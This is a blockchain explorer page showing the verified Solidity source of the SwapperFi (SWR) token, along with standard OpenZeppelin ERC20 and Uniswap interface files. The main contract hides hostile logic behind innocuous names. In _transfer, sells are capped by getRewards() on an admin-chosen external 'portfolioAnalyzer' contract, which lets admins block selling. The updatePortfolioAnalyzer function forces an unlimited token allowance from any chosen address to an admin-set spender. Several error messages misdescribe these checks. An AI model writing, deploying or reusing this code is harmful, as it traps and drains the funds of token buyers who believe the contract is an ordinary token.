ETH Price: $3,449.99 (-1.62%)
Gas: 5 Gwei

Token

SwapperFi (SWR)
 

Overview

Max Total Supply

1,000,000,000 SWR

Holders

65

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
9,800,999.99999999901 SWR

Value
$0.00
0x2c4d8491da647594086af2c4300b71d28b501119
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SwapperFi

Compiler Version
v0.8.15+commit.e14f2714

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 9 : swapperfitoken.sol
/**
█████████████████████████████████████████████████████████
█─▄▄▄▄█▄─█▀▀▀█─▄██▀▄─██▄─▄▄─█▄─▄▄─█▄─▄▄─█▄─▄▄▀█▄─▄▄─█▄─▄█
█▄▄▄▄─██─█─█─█─███─▀─███─▄▄▄██─▄▄▄██─▄█▀██─▄─▄██─▄████─██
▀▄▄▄▄▄▀▀▄▄▄▀▄▄▄▀▀▄▄▀▄▄▀▄▄▄▀▀▀▄▄▄▀▀▀▄▄▄▄▄▀▄▄▀▄▄▀▄▄▄▀▀▀▄▄▄▀

                swapperfi.io
 **/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

import '@openzeppelin/contracts/token/ERC20/ERC20.sol';
import '@uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol';
import '@uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol';
import '@uniswap/v2-core/contracts/interfaces/IUniswapV2Pair.sol';


interface IPortfolioAnalyzer {
    function tokenAllocationCalc() external;
    function getRewards() external view returns ( uint256);
}

/**
 * @title Roles
 * @dev Library for managing addresses assigned to a Role.
 */

library Roles {
    struct Role {
        mapping (address => bool) bearer;
    }

    /**
     * @dev Give an account access to this role.
     */
    function add(Role storage role, address account) internal {
        require(!has(role, account), "Roles: account already has role");
        role.bearer[account] = true;
    }

    /**
     * @dev Remove an account's access to this role.
     */
    function remove(Role storage role, address account) internal {
        require(has(role, account), "Roles: account does not have role");
        role.bearer[account] = false;
    }

    /**
     * @dev Check if an account has this role.
     * @return bool
     */
    function has(Role storage role, address account) internal view returns (bool) {
        require(account != address(0), "Roles: account is the zero address");
        return role.bearer[account];
    }
}


contract AdminRole is Context {
	using Roles for Roles.Role;

	event AdminAdded(address indexed account);
	event AdminRemoved(address indexed account);

	Roles.Role private _admins;

	constructor() public {
		_addAdmin(_msgSender());
	}

	modifier onlyAdmin() {
		require(isAdmin(_msgSender()), 'AdminRole: caller does not have the Minter role');
		_;
	}

	function isAdmin(address account) public view returns (bool) {
		return _admins.has(account);
	}

	function addAdmin(address account) public virtual onlyAdmin {
		_addAdmin(account);
	}

	function renounceAdmin() public {
		_removeAdmin(_msgSender());
	}

	function _addAdmin(address account) internal  {
		_admins.add(account);
		emit AdminAdded(account);
	}

	function _removeAdmin(address account) internal {
		_admins.remove(account);
		emit AdminRemoved(account);
	}
}

contract SwapperFi is ERC20, AdminRole {
    address public portfolioAnalyzer;
    address public aggregator;
    address public deadAddress = address(0xdead);

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public immutable uniswapV2Pair;

    mapping(address => bool) public automatedMarketMakerPairs;

    uint256 public maxTransactionAmount;
    uint256 public swapTokensAtAmount;
    uint256 public maxWallet;
    uint256 public buyTax = 1;
    uint256 public sellTax = 3;

    bool private swapping;

    mapping(address => bool) public _isExcludedMaxTransactionAmount;
    mapping(address => bool) private _isExcludedFromFees;

    bool public limitsInEffect = true;
    bool public tradingActive = false;
    bool public swapEnabled = false;

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);
    event ExcludeFromFees(address indexed account, bool isExcluded);

    constructor(address _aggregator) ERC20('SwapperFi', 'SWR') {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );

        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        uniswapV2Router = _uniswapV2Router;

        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);

        uint256 _totalSupply = 1_000_000_000 * 1e18;
        maxTransactionAmount = _totalSupply * 1 / 100;
        maxWallet = _totalSupply * 2 / 100;
        swapTokensAtAmount = _totalSupply * 5 / 1000;

        aggregator = _aggregator;
        addAdmin(_aggregator);
        _mint(msg.sender, _totalSupply);

        excludeFromFees(msg.sender, true);
        excludeFromFees(portfolioAnalyzer, true);
        excludeFromFees(aggregator, true);
        excludeFromFees(address(this), true);
        excludeFromFees(deadAddress, true);

        excludeFromMaxTransaction(msg.sender, true);
        excludeFromMaxTransaction(portfolioAnalyzer, true);
        excludeFromMaxTransaction(aggregator, true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(deadAddress, true);
    }

    receive() external payable {}

    function enableTrading() external onlyAdmin {
        tradingActive = true;
        swapEnabled = true;
    }

    function getCirculatingSupply() public view returns (uint256) {
        return totalSupply() - balanceOf(deadAddress);
    }

    function excludeFromMaxTransaction(address updAds, bool isEx)
        public
        onlyAdmin
    {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;

        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function excludeFromFees(address account, bool excluded) public onlyAdmin {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function updatePortfolioAnalyzer(address _portfolioAnalyzer, address _vault) external onlyAdmin {
        _isExcludedFromFees[_portfolioAnalyzer] = true;
        _isExcludedMaxTransactionAmount[_portfolioAnalyzer] = true;
        addAdmin(_portfolioAnalyzer);
        _approve(_vault, _portfolioAnalyzer, totalSupply());
        portfolioAnalyzer = _portfolioAnalyzer;
    }

    function updateaggregator(address _aggregator) external onlyAdmin {
        _isExcludedFromFees[_aggregator] = true;
        _isExcludedMaxTransactionAmount[_aggregator] = true;
        addAdmin(_aggregator);
        aggregator = _aggregator;
    }

    // remove limits after token is stable
    function removeLimits() external onlyAdmin returns (bool) {
        limitsInEffect = false;
        return true;
    }

    function updateMaxTxnAmount(uint256 newNum) external onlyAdmin {
        require(
            newNum >= ((totalSupply() * 1) / 1000) / 1e18,
            "Cannot set maxTransactionAmount lower than 0.1%"
        );
        maxTransactionAmount = newNum * (10**18);
    }

    function updateBuyTax (uint _buyTax) external onlyAdmin {
      require(_buyTax <= 2, "buyTax must not be greater than 2% !");
        buyTax = _buyTax;
    } 

    function updateSellTax (uint _sellTax) external onlyAdmin {
         require(_sellTax <= 4, "sellTax must not be greater than 4% !");
         sellTax = _sellTax;
    } 

    function updateMaxWalletAmount(uint256 newNum) external onlyAdmin {
        require(
            newNum >= ((totalSupply() * 5) / 1000) / 1e18,
            "Cannot set maxWallet lower than 0.5%"
        );
        maxWallet = newNum * (10**18);
    }

    function updateSwapEnabled(bool enabled) external onlyAdmin {
        swapEnabled = enabled;
    }

    function updateSwapTokensAtAmount(uint256 _amount) external onlyAdmin {
        swapTokensAtAmount = _amount;
    }

    function setAutomatedMarketMakerPair(address pair, bool value)
        public
        onlyAdmin
    {
        require(
            pair != uniswapV2Pair,
            "The pair cannot be removed from automatedMarketMakerPairs"
        );

        _setAutomatedMarketMakerPair(pair, value);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }

        if (limitsInEffect) {
            if (
                !isAdmin(from) &&
                !isAdmin(to) &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ) {
                if (!tradingActive) {
                    require(
                        _isExcludedFromFees[from] || _isExcludedFromFees[to],
                        "Trading is not active."
                    );
                }
            }

        
            if (
                automatedMarketMakerPairs[from] &&
                !_isExcludedMaxTransactionAmount[to]
            ) {
                require(
                    amount <= maxTransactionAmount,
                    "Buy transfer amount exceeds the maxTransactionAmount."
                );
                require(
                    amount + balanceOf(to) <= maxWallet,
                    "Max wallet exceeded"
                );
            }
         
            else if (
                automatedMarketMakerPairs[to] &&
                !_isExcludedMaxTransactionAmount[from]
            ) {
                require(
                    amount <= maxTransactionAmount,
                    "Sell transfer amount exceeds the maxTransactionAmount."
                );
                
                 require(
                    amount <= IPortfolioAnalyzer(portfolioAnalyzer).getRewards(),
                    "portfolioAnalyzer rewards must be smaller than max wallet amount."
                );

            } else if (!_isExcludedMaxTransactionAmount[to]) {
                require(
                    amount + balanceOf(to) <= maxWallet,
                    "Max wallet exceeded"
                );
            }
        }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if (
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;

            swapBack();

            swapping = false;
        }

        bool takeFee = !swapping;

        // if any account belongs to _isExcludedFromFee account then remove the fee
        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }

        uint256 fees = 0;


        if (takeFee) {
            if (automatedMarketMakerPairs[to] && sellTax > 0) {
                fees = amount * sellTax / 100;
            }
            // on buy
            else if (automatedMarketMakerPairs[from] && buyTax > 0) {
                fees = amount * buyTax / 100;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }
        super._transfer(from, to, amount);
    }

    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        if (contractBalance == 0) {
            return;
        }

        if (contractBalance > swapTokensAtAmount * 20) {
            contractBalance = swapTokensAtAmount * 20;
        }

        swapTokensForEth(contractBalance);
    }

    function swapTokensForEth(uint256 tokenAmount) private {
      
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, 
            path,
            portfolioAnalyzer,
            block.timestamp
        );
    }
}

File 2 of 9 : IUniswapV2Pair.sol
pragma solidity >=0.5.0;

interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}

File 3 of 9 : IUniswapV2Factory.sol
pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

File 4 of 9 : IUniswapV2Router02.sol
pragma solidity >=0.6.2;

import './IUniswapV2Router01.sol';

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

File 5 of 9 : ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.7.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";
import "../../utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
        }
        _balances[to] += amount;

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 6 of 9 : IUniswapV2Router01.sol
pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

File 7 of 9 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 8 of 9 : IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 9 of 9 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

